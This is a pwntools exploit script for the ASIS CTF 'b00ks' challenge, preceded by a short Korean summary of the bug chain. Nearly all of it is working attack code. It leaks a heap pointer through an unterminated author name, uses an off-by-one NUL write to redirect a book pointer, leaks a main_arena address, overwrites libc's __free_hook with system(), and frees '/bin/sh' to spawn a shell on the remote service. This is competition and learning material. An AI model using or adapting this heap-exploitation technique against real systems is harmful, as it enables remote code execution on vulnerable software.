버그: BSS 쪽에 힙 leak 및 off-by-one 존재. 포인터 하위 바이트를 NULL 로 덮는 것으로 시작해서 다른 객체의 pointer 를 조작하고, 결과적으로 libc __free_hook 을 하이잭해서 쉘 획득. arbitrary free 버그는 fake 임 -_-
from pwn import *
context.arch = 'amd64'  # 64-bit target: p64() emits 8-byte little-endian words

# Remote CTF service; uncomment the process() line to debug locally under gdb.
r = remote('books.asis-ctf.ir', 13007)
#r = process(['./b00ks'])
raw_input('attach')

# ---------------------------------------------------------------------------
# Thin wrappers around the b00ks menu.  Each one sends exactly the same bytes
# and consumes exactly the same prompts as the hand-unrolled version did; the
# received text is echoed with print so the transcript stays visible.
# ---------------------------------------------------------------------------


def create_book(name_size, name, desc_size, desc=None):
    """Menu 1: create a book.

    Sends the name size, the name and the description size as strings.
    The description itself is only sent when ``desc`` is given; the final
    call deliberately stops after the size so the program takes its
    allocation-failure path.
    """
    r.sendline('1')
    print r.recvuntil('size: ')
    r.sendline(name_size)
    print r.recvuntil('chars): ')
    r.sendline(name)
    print r.recvuntil('size: ')
    r.sendline(desc_size)
    if desc is None:
        return
    print r.recvuntil('tion: ')
    r.sendline(desc)
    print r.recvuntil('> ')


def delete_book(book_id):
    """Menu 2: delete the book with the given id (string)."""
    r.sendline('2')
    print r.recvuntil('delete: ')
    r.sendline(book_id)
    print r.recvuntil('> ')


def edit_book(book_id, new_desc):
    """Menu 3: rewrite a book's description.

    Once a book's description pointer has been redirected this is the
    arbitrary-write primitive used for the rest of the exploit.
    """
    r.sendline('3')
    print r.recvuntil('edit: ')
    r.sendline(book_id)
    print r.recvuntil('tion: ')
    r.sendline(new_desc)
    print r.recvuntil('> ')


def list_books():
    """Menu 4: print every book; returns the raw output up to the prompt."""
    r.sendline('4')
    return r.recvuntil('> ')


def change_author(name):
    """Menu 5: re-enter the author name."""
    r.sendline('5')
    print r.recvuntil('name: ')
    r.sendline(name)
    print r.recvuntil('> ')


def after_marker(blob, marker):
    """Return the bytes between ``marker`` and the next newline in ``blob``.

    NOTE(review): splitting on '\\n' truncates the value if the leaked
    pointer itself contains a 0x0a byte; rerun the exploit if a leak
    looks short.
    """
    return blob.split(marker)[1].split('\n')[0]


def le_bytes_to_int(raw):
    """Interpret a little-endian byte string of any length as an integer."""
    return int(raw[::-1].encode('hex'), 16)


AUTHOR = 'A' * 32   # fills the author buffer completely: no terminating NUL
FAKE_ID = 31337     # id of the fake book struct we plant in a description

# start pwn.
print r.recvuntil('name: ')
r.sendline(AUTHOR)
print r.recvuntil('> ')

# Book 1: its description holds a fake book struct {id, name, desc, desc_size}
# with the pointers still zero; they get filled in once we know the heap.
fake_book = p64(FAKE_ID) + p64(0) + p64(0) + p64(0)
create_book('224', 'A' * 224, '32', fake_book)

# Leak: the unterminated author name is printed straight into the adjacent
# pointer, so whatever follows the 32 As on that line is a heap address.
heap_addr = le_bytes_to_int(after_marker(list_books(), 'Author: ' + AUTHOR))
print hex(heap_addr)

# Redirect book 1's fields at the planted struct.  The desc pointer is the
# tricky one: heap_addr-0x20 is chosen so later edits of the fake book land
# on its own pointer fields (offsets are specific to this binary's layout).
edit_book('1', p64(FAKE_ID) + p64(heap_addr + 0x30) + p64(heap_addr - 0x20) + p64(100))

# Re-entering the author name triggers the off-by-one NUL write onto the
# low byte of the neighbouring pointer.
change_author(AUTHOR)

# Book 2: a small chunk we free right away so its fd/bk point into main_arena.
create_book('200', 'C' * 200, '200', 'D' * 200)
delete_book('2')
raw_input()

# The freed chunk's arena pointer is now readable through a book 'Name: ' line.
libc_main_arena = le_bytes_to_int(after_marker(list_books(), 'Name: '))
libc_rwbase = libc_main_arena & 0xFFFFFFFFFFFFF000
# All constants below are for the CTF's libc build only — TODO confirm against
# the target libc (nm / readelf) before reusing on another deployment.
libc_base = libc_rwbase - 0x3be000
libc_malloc_hook = libc_main_arena - 0x78
libc_free_hook = libc_main_arena + 0x2258
print hex(libc_free_hook)
print hex(libc_malloc_hook)
print hex(libc_main_arena)
print hex(libc_rwbase)
print hex(libc_base)

# Aim the fake book's description at __free_hook (desc pointer + desc size).
edit_book(str(FAKE_ID), p64(libc_free_hook) + p64(100))

# Write system() over __free_hook through that redirected description.
system = libc_base + 0x46640
edit_book(str(FAKE_ID), p64(system))

# Create a book whose name is "/bin/sh" and give an invalid description
# size: the program frees the name on the failure path, so the hijacked
# free hook runs system("/bin/sh").
create_book('100', '/bin/sh', '-1')
# get shell?
r.interactive()